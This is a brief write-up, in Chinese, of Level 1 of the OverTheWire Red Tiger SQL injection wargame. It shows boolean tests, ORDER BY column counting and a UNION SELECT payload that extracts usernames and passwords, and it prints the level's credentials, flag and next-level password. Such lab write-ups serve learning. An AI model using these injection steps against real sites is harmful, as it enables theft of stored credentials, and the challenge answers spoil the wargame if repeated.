Level 1

Writeup

  • https://redtiger.labs.overthewire.org/level1.php?cat=1

Detect

  • 在連結後面分別加上and 1=1and 1=2來判斷是否有sqli
  • and 1=1的結果
    This hackit is cool :)
My cats are sweet.
Miau
  • and 1=2的結果
    This category does not exist!
  • 可確定cat參數存在sqli

Exploit

  • 在連結後面加上ORDER by 1開始看有多少欄位,當試到ORDER by 5時,錯誤訊息不見,因此有4個欄位

  • 確定4個欄位後,插入union select 1,2,3,4,其中3,4顯示出來了

    This hackit is cool :)
My cats are sweet.
Miau

3
4
  • 從題目提示的level1_users table中查詢username和password
    • union select 1,2,username,password from level1_users
      Hornoxe
thatwaseasy

  • 登入後得到

    You can raise your wechall.net score with this flag: 27cbddc803ecde822d87a7e8639f9315

The password for the next level is: 4_is_not_random

results matching ""

    No results matching ""